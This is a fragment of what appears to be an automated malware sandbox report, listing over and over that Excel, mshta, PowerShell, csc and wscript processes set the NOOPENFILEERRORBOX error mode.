          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
